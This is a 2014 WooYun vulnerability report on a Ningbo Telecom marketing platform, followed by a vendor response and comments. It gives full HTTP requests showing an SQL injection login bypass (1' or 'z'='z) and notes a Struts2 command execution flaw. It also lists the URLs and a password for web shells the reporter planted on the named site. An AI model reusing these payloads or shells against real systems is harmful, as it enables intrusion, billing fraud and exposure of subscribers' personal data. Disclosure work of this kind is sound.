当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066538

漏洞标题:某市电信营销后台SQL注射+远程命令执行(可任意开通收费套餐)

相关厂商:中国电信

漏洞作者: 超威蓝猫

提交时间:2014-06-28 14:59

修复时间:2014-08-12 15:00

公开时间:2014-08-12 15:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-28: 细节已通知厂商并且等待厂商处理中
2014-07-03: 厂商已经确认,细节仅向厂商公开
2014-07-13: 细节向核心白帽子及相关领域专家公开
2014-07-23: 细节向普通白帽子公开
2014-08-02: 细节向实习白帽子公开
2014-08-12: 细节向公众公开

简要描述:

某市电信营销后台SQL注射+远程命令执行 或影响近百万用户
可开通任意收费套餐、无限发送短信、查询机主姓名和流量使用情况等
(你造吗,即使你用的不是电信的定制机,电信依然连你手机型号都知道的一清二楚哦 ._.

详细说明:

http://www.10008.co/

宁波电信流量辅导营销平台
登录框密码处存在Oracle AND/OR布尔型盲注
密码提交

1'


POST /user!userLogin.action HTTP/1.1
Host: www.10008.co
Proxy-Connection: keep-alive
Content-Length: 39
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.10008.co
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.10008.co/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=108F57A9E1EA2BAD86F581BC4CA0D18E; rond=5709
name=10000000000&password=1%27&yzm=5709


返回

org.springframework.orm.hibernate3.HibernateQueryException: expecting ''', found '<EOF>' [from com.hzwaso.user.bean.Loginfo u where u.telephone=10000000000 and u.password='1'']; nested exception is org.hibernate.QueryException: expecting ''', found '<EOF>' [from com.hzwaso.user.bean.Loginfo u where u.telephone=10000000000 and u.password='1'']


01.jpg


闭合语句使条件成立,提交

1' or 'z'='z


POST /user!userLogin.action HTTP/1.1
Host: www.10008.co
Proxy-Connection: keep-alive
Content-Length: 57
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.10008.co
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.10008.co/user!userLogin.action
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=108F57A9E1EA2BAD86F581BC4CA0D18E; rond=3853
name=10000000000&password=1%27+or+%27z%27%3D%27z&yzm=3853


成功登录后台:

02.jpg


经测试,后台可以查询任意宁波电信用户流量使用情况、机主姓名、手机机型等信息:

03.jpg


还可以直接给任意宁波电信用户开通流量套餐和iTV收费业务:

04.jpg


05.jpg


06.jpg


短信推送功能可以通过抓包修改短信内容哦:

07.jpg


08.jpg


此外,这个站点还存在struts2远程命令执行漏洞。(得带上含有登录后的JSESSIONID的COOKIE)

09.jpg


小马地址:http://www.10008.co/index_bak.jsp
菜刀地址:http://www.10008.co/index_bak2.jsp 密码023 (也得带上含有登录后的JSESSIONID的COOKIE)

漏洞证明:

10.jpg

11.jpg

12.jpg

修复方案:

电信更专业:)

版权声明:转载请注明来源 超威蓝猫@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-07-03 11:21

厂商回复:

根据网站归属情况,暂未能确认为电信运营商(为某第三方公司注册和管理)所属。暂未能列入处置流程。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-06-28 15:01 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    专注电信的CR

  2. 2014-06-28 15:05 | 超威蓝猫 ( 核心白帽子 | Rank:1092 漏洞数:117 | STEAM_0:0:55968383)

    @魇 CMN 你rank都超过我了/hx

  3. 2014-06-28 15:07 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    我等望尘莫及啊

  4. 2014-08-12 16:39 | D_in ( 普通白帽子 | Rank:413 漏洞数:62 | 到我嘴里来)

    联通电信狂魔